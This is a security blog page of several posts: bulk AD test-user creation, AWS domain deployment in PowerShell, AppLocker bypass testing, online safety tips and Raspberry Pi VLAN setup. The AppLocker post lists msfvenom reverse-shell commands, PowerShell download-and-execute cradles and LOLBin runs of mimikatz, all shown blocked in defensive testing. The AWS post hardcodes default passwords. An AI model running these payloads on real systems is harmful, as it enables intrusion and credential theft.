

  • Create 73,000 Test AD User Accounts

    Need to bulk-create Domain Users? This PowerShell script can generate over 73,000 accounts right out of the box. Want more? Just add extra first and last names to the CSV. While 73,000 test accounts should cover more than you’ll ever realistically need, the script can also be tweaked: remove the randomization and it will build real users directly from your CSV list.

    Download the script (CreateTestUsers.txt) and names.csv and copy them to C:\Downloads. Rename 'CreateTestUsers.txt' to 'CreateTestUsers.ps1', open it in PowerShell ISE and update the domain-specific entries. Run the script and enter the number of accounts required. Note that the closer the requested number is to the maximum possible accounts, the slower the script runs, as it struggles to generate unique names.

    Each account created gets a Profile share, a Home share and group membership, plus a random 14-character password that is written out at the end to C:\Downloads\results.txt

    Here's the script...

    Import-Module ActiveDirectory

    # Get the target OU for new users
    $orgOU = Get-ADOrganizationalUnit "ou=Test Users,ou=Org,dc=sh,dc=loc"
    $orgOU.DistinguishedName

    # Set password length
    $length = 14

    # Output file for the accounts and passwords created
    $results = "C:\Downloads\results.txt"

    # Declare inheritance and propagation flags
    $inherNone = [System.Security.AccessControl.InheritanceFlags]::None
    $propNone  = [System.Security.AccessControl.PropagationFlags]::None
    $inherCnIn = [System.Security.AccessControl.InheritanceFlags]::ContainerInherit
    $propInOn  = [System.Security.AccessControl.PropagationFlags]::InheritOnly
    $inherObIn = [System.Security.AccessControl.InheritanceFlags]::ObjectInherit
    $propNoPr  = [System.Security.AccessControl.PropagationFlags]::NoPropagateInherit

    # Current number of users in the OU
    $aduE = Get-ADUser -Filter {samaccountname -like "*"} -SearchBase $orgOU
    $existing = $aduE.Count

    # Import the list of first names and surnames
    $Names = "C:\Downloads\names.csv"
    $impName = Import-Csv -Path $Names

    # Work out the maximum number of unique users that can be created
    $FNCT = ($impName.firstname | Where-Object {$_.Trim() -ne ""}).Count
    $SNCT = ($impName.surname   | Where-Object {$_.Trim() -ne ""}).Count
    $maxUN = $FNCT * $SNCT
    $total = $maxUN - 10

    do {
        [int]$NOS = Read-Host "Max user accounts is $total, how many do you need"
    } until ($NOS -le $total)

    $UserLists = @{}

    # Randomise first name and surname combinations until the requested count is reached
    do {
        $FName = ($impName.firstname | Where-Object {$_.Trim() -ne ""}) | Sort-Object {Get-Random} | Select-Object -First 1
        $SName = ($impName.surname   | Where-Object {$_.Trim() -ne ""}) | Sort-Object {Get-Random} | Select-Object -First 1
        $UserIDs = $FName + "." + $SName
        try {$UserLists.Add($UserIDs, $UserIDs)} catch {}
        $UserIDs = $null
        Write-Host $UserLists.Count
    } until ($UserLists.Count -eq $NOS)

    $ADUs = $UserLists.Values

    # Load System.Web for the random password generator
    Add-Type -AssemblyName System.Web

    foreach ($ADU in $ADUs) {
        # Generate a random complex password
        $pwd = [System.Web.Security.Membership]::GeneratePassword($length, 4)

        # Split the username to provide the first name and surname
        $ADComp = Get-ADUser -Filter {samaccountname -eq $ADU}
        $spUse = $ADU.Split('.')
        $firstNe = $spUse[0]
        $surNe = $spUse[1]
        $pwSec = ConvertTo-SecureString "$pwd" -AsPlainText -Force

        # Create the user account if it doesn't already exist
        if ($null -eq $ADComp) {
            New-ADUser -Name "$ADU" `
                -SamAccountName "$ADU" `
                -AccountPassword $pwSec `
                -GivenName "$firstNe" `
                -Surname "$surNe" `
                -DisplayName "$firstNe $surNe" `
                -Description "TEST $ADU" `
                -Path $orgOU `
                -Enabled $true `
                -ProfilePath "\\shdc1\Profiles$\$ADU" `
                -HomeDirectory "\\shdc1\Home$\$ADU" `
                -HomeDrive "H:"

            # Create the home directory and set permissions
            New-Item "\\shdc1\Home$\$ADU" -ItemType Directory -Force
            $gADU = Get-ADUser $ADU
            $H = "\\shdc1\Home$\$ADU"
            $getAcl = Get-Acl $H
            $fileAcc = New-Object System.Security.AccessControl.FileSystemAccessRule($gADU.SID, "Modify", "$inherCnIn,$inherObIn", "None", "Allow")
            $getAcl.SetAccessRule($fileAcc)
            Set-Acl $H $getAcl

            # Add group membership
            Add-ADGroupMember -Identity "DFSAccess" -Members $ADU

            # Write the account and password to the results file
            $ADU | Out-File $results -Append
            $pwd | Out-File $results -Append
            " "  | Out-File $results -Append
        }
        else {"nope exists "}
        Write-Host $ADU
    }

    # Total users in the OU
    $aduC = Get-ADUser -Filter {samaccountname -like "*"} -SearchBase $orgOU
    $TotalU = $aduC.Count

    # Total users created
    Write-Host "Total New Users" ($TotalU - $existing)
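As a quick sanity check of the password generator used in the script above, GeneratePassword can be run on its own. A minimal sketch, assuming Windows PowerShell 5.1 (System.Web is part of the .NET Framework and isn't available in all PowerShell 7 sessions):

```powershell
# Generate five sample 14-character passwords, each with at least 4 non-alphanumeric characters
Add-Type -AssemblyName System.Web
1..5 | ForEach-Object {
    [System.Web.Security.Membership]::GeneratePassword(14, 4)
}
```

Useful for confirming the password complexity meets your domain's password policy before creating thousands of accounts.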

  • Deploying Windows Domains as an EC2 Instance with PowerShell - Part 2

    Welcome to Part 2! Let's take a deep dive into the specifics of what the DeployVPCwithDomain.ps1 script creates in AWS. Here's a quick recap: a public-facing Remote Desktop Server (RDS) and a private Domain Controller (DC) will be deployed into AWS, with all the required AWS infrastructure and services, using PowerShell. If you haven't read Part 1, I strongly suggest you do, and ensure all the prerequisites are fulfilled; otherwise, it's likely to get messy. To reiterate, deploying this will incur AWS costs: the instance type is t3.medium and the volume is set to $ebsVolType = "io1" and $ebsIops = 1000

    Prerequisites

    PowerShell version 7 or Visual Studio Code is required
    An AWS account and its corresponding Access ID and Secret Key
    The AWS account requires the 'AdministratorAccess' role or delegated permissions
    A basic understanding of both AWS and Windows Domains

    This blog will focus on the execution of the script and the provisioning of the AWS services, including the configuration of the VPC, subnets and security groups, and the deployment of EC2 instances. You’ll also see how the script sets up a fully functional Active Directory environment, complete with a domain controller, OU, delegation and GPO configuration.

    Let's Get Started!

    Begin by loading DeployVPCwithDomain.ps1 in Visual Studio Code with elevated rights. I normally press 'Ctrl + A' and then F8 to execute the script; equally, F5 works. The script starts by installing the necessary AWS PowerShell modules from the PowerShell Gallery. Loading the modules can be problematic. If any of the modules fail, the script should catch the error. I suggest closing VS Code, deleting the modules from "C:\Users\%username%\Documents\PowerShell\Modules\", and then restarting the script from VS Code.

    Access Key and Secret Access Key

    Enter both the Access Key and Secret Key created for the service account.
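The module and credential steps above can be sketched as follows. The exact list of AWS.Tools sub-modules the script installs may differ, and the profile name is illustrative:

```powershell
# Install the modular AWS.Tools PowerShell modules (sub-module list assumed)
Install-Module -Name AWS.Tools.Installer -Scope CurrentUser -Force
Install-AWSToolsModule AWS.Tools.EC2, AWS.Tools.S3, AWS.Tools.IdentityManagement -CleanUp

# Store and select the service account's keys ('deploy-profile' is an example name)
Set-AWSCredential -AccessKey 'AKIA................' -SecretKey '<secret-key>' -StoreAs 'deploy-profile'
Set-AWSCredential -ProfileName 'deploy-profile'
```

Storing the keys as a named profile avoids pasting them each run, but remember the profile persists on disk.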
    Regions

    The script sets the default AWS region using Set-DefaultAWSRegion -Region $region1, and this region is also hardcoded in the userdata script for both S3 and EC2 instances.

    $region1 = "us-east-1" # this is hardcoded in the ec2 userdata script
    Set-DefaultAWSRegion -Region $region1

    VPC

    The VPC is configured with the following CIDR block: $cidr = "10.1.1" and $cidrFull = "$($cidr).0/24". This CIDR block specifies the VPC's address range, providing 254 usable IP addresses.

    $cidr = "10.1.1"
    $cidrFull = "$($cidr).0/24"
    $newVPC = New-EC2Vpc -CidrBlock "$cidrFull"
    $vpcID = $newVPC.VpcId

    Subnets

    Two subnets, each with 30 usable addresses, will be created from the VPC: one for public access and one for private use.

    $Ec2subnetPub = New-EC2Subnet -CidrBlock "$($cidr).0/27" -VpcId $vpcID
    $Ec2subnetPriv = New-EC2Subnet -CidrBlock "$($cidr).32/27" -VpcId $vpcID

    Internet Gateway

    An Internet Gateway enables communication between your VPC and the Internet by acting as a bridge, allowing instances within your VPC to send and receive traffic from the Internet.

    $Ec2InternetGateway = New-EC2InternetGateway
    $InterGatewayID = $Ec2InternetGateway.InternetGatewayId
    Add-EC2InternetGateway -InternetGatewayId $InterGatewayID -VpcId $vpcID

    Public and Private Route Tables

    To enable internet access for your VPC's public subnet, you'll need to create a route table and configure it to direct traffic to the Internet Gateway.

    $Ec2RouteTablePub = New-EC2RouteTable -VpcId $vpcID
    New-EC2Route -RouteTableId $Ec2RouteTablePub.RouteTableId -DestinationCidrBlock "0.0.0.0/0" -GatewayId $InterGatewayID
    Register-EC2RouteTable -RouteTableId $Ec2RouteTablePubID -SubnetId $SubPubID

    Public IP

    Invoke-WebRequest fetches your public IP address by querying ifconfig.me/ip. If the request fails or returns an empty value, it defaults to "10.10.10.10".
    $whatsMyIP = (Invoke-WebRequest ifconfig.me/ip).Content.Trim()
    if ([string]::IsNullOrWhiteSpace($whatsMyIP) -eq $true){$whatsMyIP = "10.10.10.10"}

    If the Jump box becomes inaccessible, and unless your public IP is static, your IP is likely to have changed, making it necessary to update the public security group.

    Security Groups

    This script creates 2 security groups within the specified VPC. The PublicSubnet security group manages traffic rules for public subnet instances.

    $SecurityGroupPub = New-EC2SecurityGroup -Description "Public Security Group" -GroupName "PublicSubnet" -VpcId $vpcID -Force -ErrorAction Stop

    The script defines inbound and outbound rules for a security group.

    # Inbound Rules
    $InTCPWhatmyIP3389 = @{IpProtocol="tcp"; FromPort="3389"; ToPort="3389"; IpRanges="$($whatsMyIP)/32"}

    # Outbound Rules
    $EgAllCidr = @{IpProtocol="-1"; FromPort="-1"; ToPort="-1"; IpRanges=$cidrFull}

    Grant-EC2SecurityGroupIngress applies inbound rules to the defined security group.

    Grant-EC2SecurityGroupIngress -GroupId $SecurityGroupPub -IpPermission @($InTCPWhatmyIP3389)

    S3 Bucket

    An S3 bucket is created to host the AD script.

    $news3Bucket = New-S3Bucket -BucketName "auto-domain-create-$($dateTodayMinutes)"
    $s3BucketName = $news3Bucket.BucketName
    $S3BucketARN = "arn:aws:s3:::$($s3BucketName)"
    $s3Url = "https://$($s3BucketName).s3.amazonaws.com/Domain/"

    S3 Bucket Access

    To grant the EC2 instance access to the S3 bucket for running the AD script, a new IAM user is created.

    $s3User = "DomainCtrl-S3-READ"
    $newIAMS3Read = New-IAMUser -UserName $s3User

    A new access key for the IAM user is generated and written into the UserData, allowing the EC2 instance to securely authenticate and access the S3 bucket.

    $newIAMAccKey = New-IAMAccessKey -UserName $newIAMS3Read.UserName
    $iamS3AccessID = $newIAMAccKey.AccessKeyId
    $iamS3AccessKey = $newIAMAccKey.SecretAccessKey

    The following IAM Group is created and the IAM user added to the group.
    $s3Group = 'S3-AWS-DC'
    New-IAMGroup -GroupName 'S3-AWS-DC'
    Add-IAMUserToGroup -GroupName $s3Group -UserName $s3User

    The policy for read access to the S3 bucket is defined.

    $s3Policy = @'
    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Action": [
            "s3:Get*",
            "s3:List*",
            "s3:Describe*"
          ],
          "Resource": "*"
        }
      ]
    }
    '@

    The IAM policy is created and added to the above group.

    $iamNewS3ReadPolicy = New-IAMPolicy -PolicyName 'S3-DC-Read' -Description 'Read S3 from DC' -PolicyDocument $s3Policy
    Register-IAMGroupPolicy -GroupName $s3Group -PolicyArn $iamNewS3ReadPolicy.Arn

    VPC Endpoint

    A VPC endpoint, which allows resources within your VPC to connect privately to AWS services without needing an internet gateway, is created to allow the private EC2 instance to access the S3 bucket.

    $newEnpointS3 = New-EC2VpcEndpoint -ServiceName "com.amazonaws.us-east-1.s3" -VpcEndpointType Gateway -VpcId $vpcID -RouteTableId $Ec2RouteTablePubID, $Ec2RouteTablePrivID

    UserData Scripts

    EC2 UserData provides commands automatically to the instance at its initial launch and first boot. In this case, the PowerShell script changes the default AWS-assigned password to 'ChangeMe1234' and renames the public EC2 instance to JUMPBOX1.

    $RDPScript = '
    Set-LocalUser -Name "administrator" -Password (ConvertTo-SecureString -AsPlainText ChangeMe1234 -Force)
    Rename-Computer -NewName "JUMPBOX1"
    shutdown /r /t 10
    '

    The PowerShell script for EC2 instance UserData is encoded in Base64 because AWS requires userdata to be in this format.

    $RDPUserData = [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($RDPScript))

    EC2 Encrypted Volumes

    EC2 encrypted volumes use AWS Key Management Service (KMS) to automatically encrypt data at rest, in transit between the instance and the volume, and during snapshots. This ensures that all data on the volume is securely protected, with encryption keys managed by AWS.
    To enable EC2 encrypted volumes, KMS permissions must be granted in IAM, and the following values are specified.

    $ebsVolType = "io1"
    $ebsIops = 2000
    $ebsTrue = $true
    $ebsFalse = $false
    $ebsKmsKeyArn = $newKMSKey.Arn
    $ebsVolSize = 50

    $blockDeviceMapping = New-Object Amazon.EC2.Model.BlockDeviceMapping
    $blockDeviceMapping.DeviceName = "/dev/sda1"
    $blockDeviceMapping.Ebs = New-Object Amazon.EC2.Model.EbsBlockDevice
    $blockDeviceMapping.Ebs.DeleteOnTermination = $ebsTrue
    $blockDeviceMapping.Ebs.Iops = $ebsIops
    $blockDeviceMapping.Ebs.KmsKeyId = $ebsKmsKeyArn
    $blockDeviceMapping.Ebs.Encrypted = $ebsTrue
    $blockDeviceMapping.Ebs.VolumeSize = $ebsVolSize
    $blockDeviceMapping.Ebs.VolumeType = $ebsVolType

    Additional help can be found @ https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2/image/block_device_mappings.html

    EC2 Instance Attributes

    The New-EC2Instance command and the following configuration parameters are declared to deploy and manage the EC2 instances in AWS.

    $new2022InstancePub = New-EC2Instance `
        -ImageId $gtSrv2022AMI.value `
        -MinCount 1 -MaxCount 1 `
        -KeyName $newKeyPair.KeyName `
        -SecurityGroupId $SecurityGroupPub `
        -InstanceType t3.medium `
        -SubnetId $SubPubID `
        -UserData $RDPUserData `
        -BlockDeviceMapping $blockDeviceMapping

    Accessing the Jump Box

    The public RDP jump box, accessible only from your public IP, will launch quickly. Retrieve the instance's public IP from the AWS EC2 page, type 'mstsc' at the Run command, and enter the IP. Be sure to wait for the instance to fully initialize before connecting. Enter 'Administrator' and the password 'ChangeMe1234'; once logged on, change the password to something more secure.

    Accessing the Domain Controller

    The Domain Controller will take some time to deploy, even after it shows as Running on the EC2 page. It undergoes a few reboots and runs scripts to install AD roles, create an OU structure, delegate access, and set up the GPOs.
    It's a good time to grab a coffee and take a 10-minute break. Once you've finished your coffee, retrieve the Domain Controller's private IP, based on the VPC private subnet, from the AWS EC2 page. Then, from within the Jump box, launch 'mstsc' and enter the Domain Controller's IP. The FQDN for the domain is 'testdom.loc'. Enter 'Administrator' and the password 'ChangeMe1234'. To update the password, open 'Active Directory Users and Computers', find the 'Administrator' account, and reset the password.

    OU Structure

    A comprehensive OU structure with GPOs, URA, and Restricted and Nested Groups is deployed in a tiered model. It's too involved to cover here, but a full description can be found @ https://www.tenaka.net/post/deploy-domain-with-powershell-and-json-part-2-ou-delegation

    JSON

    The script deployed for AWS is a slightly modified version of the original. As before, it is tied to the hostname of the Domain Controller, which is hardcoded as 'AWSDC01' in both the UserData and the JSON file. The other modification involves the IP address: the IP section in the JSON file is ignored, with the Domain Controller being statically assigned the IP provided by AWS's DHCP server.

    {
      "FirstDC": {
        "PDCName":"AWSDC01",
        "PDCRole":"true",
        "IPAddress":"10.0.2.69",
        "Subnet":"255.255.255.0",
        "DefaultGateway":"10.0.2.1",
        "CreateDnsDelegation":"false",
        "DatabasePath":"c:\\Windows\\NTDS",
        "DomainMode":"WinThreshold",
        "DomainName":"testdom.loc",
        "DomainNetbiosName":"TESTDOM",
        "ForestMode":"WinThreshold",
        "InstallDns":"true",
        "LogPath":"c:\\Windows\\NTDS",
        "NoRebootOnCompletion":"false",
        "SysvolPath":"c:\\Windows\\SYSVOL",
        "Force":"true",
        "DRSM":"Recovery1234",
        "DomAcct":"Administrator",
        "DomPwd":"ChangeMe1234",
        "PromptPw":"false"
      },

    Finally.....

    These two posts only scratch the surface of deploying Active Directory on AWS with PowerShell. Additional AD sites, VPNs, AWS Transit Gateways and AD integration into AWS are some of the topics I hope to cover in the future.
For now, thank you for taking the time to read my blog; I truly appreciate it. I hope you found it useful.

  • Applocker - Are Publisher Rules Necessary

    This is a supplement to the Applocker vs Malware article, which you should read first @ https://www.tenaka.net/applocker-vs-malware

    I've comprehensively covered Applocker and its 'features' on this site, from click-bait prevention with an out-of-the-box configuration to hardening Applocker to protect the protector from being circumvented. The latter's policy is a combination of Publisher, hash, file and folder approvals and denials.

    Before I start, the following is not recommended; this is exploratory testing and a proof of concept of Applocker's behaviour. Does Applocker require all those Publisher approvals? Can the system be protected with only file and folder approvals and denies?

    Previous - Applocker vs Malware

    The client is Windows 11 Enterprise x64 with no AV protection, and all tests will be executed as the user, unless specified.

    The Policy - Approvals

    Applocker will be configured with the following approval policy: EXEs, MSIs, Scripts and DLLs are configured to approve any file in %ProgramFiles% and %WinDir%, similar to the default rules.

    The Policy - Denies

    Protection relies solely on preventing any bypass or escalation of code, denying EXEs, MSIs, Scripts and DLLs in any directory the user has 'Write' permission to. The following directory list is dynamic and changes with different installed languages. Download and run my Security Validation script ( here ) when non-US languages are installed.
    C:\Windows\System32\LogFiles\WMI
    C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
    C:\Windows\System32\Tasks
    C:\Windows\System32\Tasks\Microsoft\Windows\RemoteApp and Desktop Connections Update
    C:\Windows\SysWOW64\Tasks
    C:\Windows\SysWOW64\Tasks\Microsoft\Windows\RemoteApp and Desktop Connections Update
    C:\Windows\tracing
    C:\Windows\PLA\Reports
    C:\Windows\PLA\Reports\en-US
    C:\Windows\PLA\Rules
    C:\Windows\PLA\Rules\en-US
    C:\Windows\PLA\Templates
    C:\Windows\Registration\CRMLog
    C:\Windows\servicing\Packages
    C:\Windows\servicing\Sessions
    C:\Windows\System32\Com\dmp
    C:\Windows\System32\spool\drivers\color
    C:\Windows\System32\spool\PRINTERS
    C:\Windows\System32\spool\SERVERS
    C:\Windows\System32\Tasks\Microsoft\Windows\PLA
    C:\Windows\System32\Tasks\Microsoft\Windows\PLA\System
    C:\Windows\SysWOW64\Com\dmp
    C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA
    C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
    C:\Windows\Tasks
    C:\Windows\Temp
    C:\Users
    C:\ProgramData

    To prevent Living off the Land with Microsoft's signed programs, I'm following Microsoft's recommended deny list ( here ) as a baseline. I've added a few more to my list as part of an automated Applocker script to protect the system from various attacks ( here ). The final config should look something like this.

    The Rematch

    Simple: generate reverse shells with MSFVenom and execute them whilst trying to bypass Applocker.

    EXE

    Generate an exe with the following command.

    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.1 lport=8888 -f exe -o /home/user/Malware/rev1.0.exe

    Execution is prevented by denying C:\Users\*

    HTA

    Generate an HTML Application Payload (HTA) with the following:

    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.1 lport=8888 -f hta-psh -o /home/user/Malware/rev1.0.hta

    Execute the following command after downloading the .hta file to the local system.

    mshta.exe C:\users\user\download\rev1.0.hta

    Execution is prevented by denying mshta.exe, a signed Microsoft program.
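Each path in the deny list above earns its place because a standard user can write there. A quick way to confirm this on your own build is a write probe; a sketch, with the probe path picked arbitrarily from the list:

```powershell
# Spot-check whether the current (non-admin) user can create a file in a listed path
$probe = 'C:\Windows\Tasks\probe.txt'   # any path from the deny list above
try {
    New-Item -Path $probe -ItemType File -ErrorAction Stop | Out-Null
    Write-Host "User-writable: the deny rule is justified"
    Remove-Item $probe
} catch {
    Write-Host "Not writable in this context"
}
```

Run it as the standard user, not elevated, otherwise admin rights will mask the result.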
    Word Macro

    The following MSFConsole commands generate a reverse shell for Microsoft Word.

    use exploit/multi/fileformat/office_word_macro
    set TARGET 0
    set lhost 10.0.0.1
    set lport 8888

    The Word Macro unpacks to an .exe; it's prevented from executing by denying execution within C:\Users\

    Powershell

    Generate a reverse shell PS1 script with the following command.

    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.1 lport=8888 -f ps1 -o /home/user/Malware/rev1.0.ps1

    Execution is prevented by denying C:\Users\*

    Powershell Web

    Local PowerShell scripts are blocked, but what of remote calls that load into memory?

    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

    powershell -ExecutionPolicy Bypass -Command "[scriptblock]::Create((Invoke-WebRequest 'https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1' -UseBasicParsing).Content).Invoke();"

    Constrained Language mode is still protecting the system.

    DLL

    The following command creates a DLL reverse shell.

    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.1 lport=8888 -f dll -o /home/user/Malware/rev1.1.dll

    Download the DLL, then execute the following commands on the Windows client.

    copy rev1.1.dll C:\Windows\Temp
    rundll32.exe C:\Windows\Temp\rev1.1.dll,0

    Execution is prevented by denying directories where users can 'Write', in this case C:\Windows\Temp, which would otherwise have been an authorised path.

    Reverse Shell and MimiKatz as XML

    The following command generates an XML reverse shell.

    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.1 lport=8888 -f csharp -o /home/user/Malware/rev1.5.xml

    cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319

    Execute the following commands.
    msbuild.exe C:\users\admin\downloads\mimikatz.xml
    msbuild.exe C:\users\admin\downloads\rev1.5.xml

    Execution is prevented by denying msbuild.exe, a signed Microsoft program.

    Standing Eight Count

    Keeping with the boxing analogy of Applocker versus malware, I hope 'Standing Eight Count' is appropriate. A correctly implemented Applocker policy, as described above, does prevent various types of malware from executing under the user context. Execution is constrained to the authorised named directories, 'Program Files' and 'Windows'. Directories that allow the user to 'Write' deny any type of execution.

    Is this approach recommended? No. The chances of maintaining the perfect deny policy are slim in the real world. Any exception to the deny ruleset leaves the system open to bypassing Applocker, without any Publisher rules to fall back on.

    Finally, I did this to better understand Applocker's behaviour, not as a serious method to implement. It does validate the benefits of configuring a deny policy.
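Before enforcing a policy like the one tested above, the built-in AppLocker cmdlets can dry-run it against sample payloads. A sketch, with the export path and test file paths assumed:

```powershell
# Export the effective AppLocker policy, then ask whether a user-profile exe would run
Get-AppLockerPolicy -Effective -Xml | Out-File 'C:\Temp\Applocker.xml'
Test-AppLockerPolicy -XmlPolicy 'C:\Temp\Applocker.xml' `
    -Path 'C:\Users\user\Downloads\rev1.0.exe' `
    -User Everyone
```

The output reports Allowed or Denied per file, along with the matching rule, which makes it easy to spot a gap in the deny list before an attacker does.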

  • Staying Safe on the Internet: Essential Tips for Protecting Yourself Online

    These days, the Internet is such a big part of our daily lives. Whether we’re banking, chatting with friends, shopping, or learning something new, we’re always online. While it opens up a world of possibilities, it also comes with risks to our personal info, privacy, and security. As cyber threats keep evolving, it’s more important than ever to know how to stay safe online. Let’s go over a few simple tips to help you protect yourself while navigating the Internet.

    Use Strong, Unique Passwords

    Your password is your first line of defense against unauthorized access. Make sure it’s strong and unique. A good password should:

    Be at least 12 characters long, mine are at least 20.
    Include a mix of uppercase and lowercase letters, numbers, and symbols.
    Avoid easily guessable words like "password" or personal information such as your name or birthday.
    Be changed every 6 to 12 months.

    Reusing passwords or partial passwords across multiple accounts can put you at significant risk. When a company or service is hacked, user data, including usernames and passwords, can be stolen. These credentials are often sold or shared on the dark web or hacker forums. Even if only one account is compromised, reusing the same password across different accounts can have a ripple effect.

    Tip: Consider using a password manager to store and generate secure passwords.

    Enable Two-Factor Authentication (2FA)

    Two-factor authentication adds an extra layer of security by requiring a second form of verification in addition to your password. This could be a code sent to your phone, a fingerprint, or facial recognition. Even if someone has your password, they won’t be able to access your account without the second factor.

    Tip: Use the Google Authenticator app.

    Keep Software and Devices Updated

    Cybercriminals often exploit vulnerabilities in outdated software to gain access to your devices.
    Regularly updating your operating system, apps, and antivirus software helps protect against these vulnerabilities. Enable automatic updates on your devices to ensure you always have the latest security patches, and remove infrequently used or unused apps from your phone.

    Be Smart with Downloads

    Downloading software or files from untrusted websites can expose your device to malware. Only download apps from official stores (such as Google Play or the Apple App Store) and avoid pirated content. Malware can steal sensitive information or even hold your device hostage (ransomware).

    Tip: Ensure all devices have anti-virus software.

    Be Cautious with Public Wi-Fi

    Public Wi-Fi networks, like those in cafes or airports, can be convenient but risky. Hackers can intercept your data if you’re not careful. Avoid accessing sensitive accounts (such as banking or email) over public Wi-Fi without using a virtual private network (VPN). A VPN encrypts your data and adds an extra layer of protection.

    Beware of Phishing Scams

    Phishing scams are attempts by cybercriminals to trick you into revealing personal information by pretending to be someone trustworthy, such as a bank or a colleague. These scams often come in the form of emails or text messages that contain malicious links or attachments.

    How to Avoid Phishing

    Don’t click on links or download attachments from unknown senders.
    Verify the sender’s email address and look for suspicious grammar or spelling errors.
    If you receive a suspicious email from a legitimate organization, contact them directly using verified contact information.

    Use Privacy Settings

    On social media platforms and other online services, take the time to review and adjust your privacy settings. Limit the amount of personal information you share publicly, and ensure that only trusted individuals can view your private details. Many websites and apps track your online activity, so disabling tracking features can improve your privacy.
    Secure Your Home Wi-Fi Network

    Your home Wi-Fi network is the gateway to all of your internet-connected devices. To protect it:

    Change the default router password to something strong and unique.
    Use WPA3 or WPA2 encryption.
    Hide your network by disabling SSID broadcasting.
    Enable a guest network for visitors, so they don’t have access to your main devices.

    Monitor Your Online Accounts

    Regularly monitoring your accounts can help you spot suspicious activity early. Many online services offer notifications for unusual activity, such as login attempts from unknown devices. If you notice anything out of the ordinary, change your password immediately and report the issue to the service provider.

    Tip: Set up account activity alerts where possible to stay informed of any unusual actions.

    Educate Yourself

    The digital world is constantly evolving, and so are the threats. Staying informed about the latest online security trends can help you avoid falling victim to new scams or vulnerabilities. Follow trusted security blogs, attend webinars, and consider taking online courses to enhance your knowledge of cybersecurity.

    Conclusion

    By practicing these habits, you can significantly reduce the risk of falling victim to cyber-attacks. Staying safe on the internet requires vigilance, but by taking the right precautions, you can enjoy the benefits of the digital world with peace of mind. Protect your personal information, stay alert to potential threats, and always prioritize your online safety.
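As a footnote to the password advice above, here's a minimal PowerShell sketch of generating a password that meets the length-and-mix recommendation. Note that Get-Random is not a cryptographic generator, so a password manager is still the better tool:

```powershell
# Build a 20-character password from upper, lower, digits and symbols
# (ambiguous characters like I, l, O, 0 and 1 are left out of the pool)
$chars = 'ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz23456789!$%^&*#'.ToCharArray()
$password = -join (1..20 | ForEach-Object { $chars | Get-Random })
$password
```

Re-run until the result happens to include all four character classes, or add a check loop if you want that guaranteed.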

  • Enabling Raspberry Pi vLAN Tagging

    Back in December 2024, I put together an article on installing and configuring a Raspberry Pi and Pi-Hole. It’s over here if you’re curious: https://www.tenaka.net/post/pi-hole-ad-blocker-setup

    The initial deployment was a straightforward dual-Pi setup on a flat 192.168.0.0/24 network. It was simple to manage and, at the time, I was content relying on the existing Windows security and firewall controls to protect the domain-joined systems. However, as the network footprint expanded, with an increasing number of Internet-facing devices and other less-trustworthy endpoints, "stuff" made East of where I live, the risk profile changed significantly. Relying on a flat topology became untenable, and the lack of segmentation started to feel like an open invitation for lateral movement. It was clear the convenience trade-off had reached its limit. So I decided to implement a vLAN or two. First, a very basic explanation of vLANs.

    VLAN (Virtual LAN)

    A VLAN (Virtual LAN) is a logical segmentation of a network at Layer 2 that allows you to group devices as if they were on separate physical networks, even if they share the same switch or cable. By isolating traffic between VLANs, broadcast domains are reduced and lateral movement is limited, improving both performance and security. Communication between VLANs requires routing, typically through a Layer 3 switch or, in my case, a new pfSense firewall, giving control over the ports and IPs that can communicate.

    That covers the why, but not the how, specifically how I got VLAN tagging working on the Raspberry Pis. On Windows, it’s pretty much a checkbox and you're done. On Raspbian? Yeah... not quite that simple. Before bashing the keyboard: Pi-Hole is at version 6.0.6, installed on Raspberry Pi 4s with 4GB RAM, with Raspbian on kernel 6.6 plus all the latest updates. IP addresses are DHCP-assigned and then reserved.

    Install VLAN Package

    Install the latest updates and then the vlan package.
    sudo apt update
    sudo apt install vlan

    Load the 8021q kernel module, which is essential for enabling VLAN tagging on network interfaces.

    sudo modprobe 8021q
    echo "8021q" | sudo tee -a /etc/modules

    Define how the VLAN interface is configured.

    sudo nano /etc/systemd/network/25-vlan.network

    [Match]
    Name=eth0.VLAN_ID

    [Network]
    DHCP=yes

    This file instructs systemd-networkd how to create and manage the VLAN interface.

    sudo nano /etc/systemd/network/25-vlan.netdev

    [NetDev]
    Name=eth0.VLAN_ID
    Kind=vlan

    [VLAN]
    Id=VLAN_ID

    Update the VLAN tagging on the network switch port that the Pis are plugged into. Then restart networking; as these files are read by systemd-networkd, restart that service.

    sudo systemctl restart systemd-networkd
    sudo systemctl status systemd-networkd

    Confirm the IP has updated from 192.168.0.70 to 192.168.10.70.

    ip addr show

    Finally, I updated the Domain Controller's DNS Forwarders to point to the new addresses.
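For a quick one-off test before committing the persistent systemd-networkd config above, the same tagging can be done with iproute2. A sketch; the interface name eth0 and VLAN ID 10 are illustrative, and the sub-interface disappears on reboot:

```shell
# Create a temporary VLAN sub-interface on eth0 with tag 10
sudo ip link add link eth0 name eth0.10 type vlan id 10
sudo ip link set dev eth0.10 up

# Request a DHCP lease on the tagged interface
sudo dhclient eth0.10

# Inspect the new interface and its VLAN id
ip -d link show eth0.10
```

Handy for confirming the switch port's tagging is right before you lose remote access to a headless Pi on a bad persistent config.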

  • Deny Domain Admins Logon to Workstations

    There's a common theme running through many of the security articles on this site: prevent the lateral movement of attackers around the domain as they search for escalation points to elevate to Domain Admin. Preventing escalation via cached or actively logged-on privileged accounts can be accomplished with segregated tiers between Workstations, Servers and Domain Controllers. Implementing tiers does not prevent exploitation of system vulnerabilities and escalation via an RCE, for example.

